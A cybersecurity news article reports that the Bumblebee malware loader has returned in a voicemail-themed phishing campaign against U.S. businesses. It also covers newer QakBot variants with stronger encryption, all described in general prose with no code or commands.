Cyber security news for all

More

    The Return of Bumblebee c: New Tricks Targeting U.S. Businesses

    After a four-month hiatus, the notorious malware loader and initial access broker known as Bumblebee has reappeared in a new phishing campaign aimed at U.S. businesses, according to cybersecurity firm Proofpoint.

    The campaign, observed in February 2024, targets organizations with voicemail-themed lures containing links to OneDrive URLs. These URLs lead to Word files with names like “ReleaseEvans#96.docm,” which, when opened, spoof the consumer electronics company Humane.

    The Word document uses VBA macros to launch a PowerShell command, which then downloads and executes another PowerShell script from a remote server. This script retrieves and runs the Bumblebee loader.

    First detected in March 2022, Bumblebee is primarily used to download and execute follow-on payloads such as ransomware. It has been utilized by several crimeware threat actors known for delivering BazaLoader (aka BazarLoader) and IcedID.

    Bumblebee is suspected to be developed by the Conti and TrickBot cybercrime syndicate as a replacement for BazarLoader. In September 2023, Intel 471 disclosed a Bumblebee distribution campaign that utilized WebDAV servers to disseminate the loader.

    The attack chain is notable for its use of macro-enabled documents, especially considering that Microsoft began blocking macros in Office files downloaded from the internet by default in July 2022. This change prompted threat actors to modify and diversify their approaches.

    The return of Bumblebee coincides with the resurgence of new variants of QakBot, ZLoader, and PikaBot, with samples of QakBot distributed as Microsoft Software Installer (MSI) files.

    The latest QakBot variants have been found to harden the encryption used to conceal strings and other information, making analysis more challenging. The new generation also reinstates the ability to detect whether the malware is running inside a virtual machine or sandbox.

    Additionally, QakBot now encrypts all communications with the command-and-control (C2) server using AES-256, a stronger method than before the dismantling of QakBot’s infrastructure in late August 2023.

    “The takedown of the QakBot botnet infrastructure was a victory, but the bot’s creators remain free, and someone who has access to QakBot’s original source code has been experimenting with new builds and testing the waters with these latest variants,” said Andrew Brandt, principal researcher at Sophos X-Ops.

    QakBot has emerged as the second most prevalent malware for January 2024, trailing behind FakeUpdates (aka SocGholish) but ahead of other families like Formbook, Nanocore, AsyncRAT, Remcos RAT, and Agent Tesla.

    These developments come as Malwarebytes revealed a new campaign in which phishing sites mimicking financial institutions trick potential targets into downloading legitimate remote desktop software to purportedly resolve non-existent issues, allowing threat actors to gain control of the machine.

    Recent Articles

    Related Stories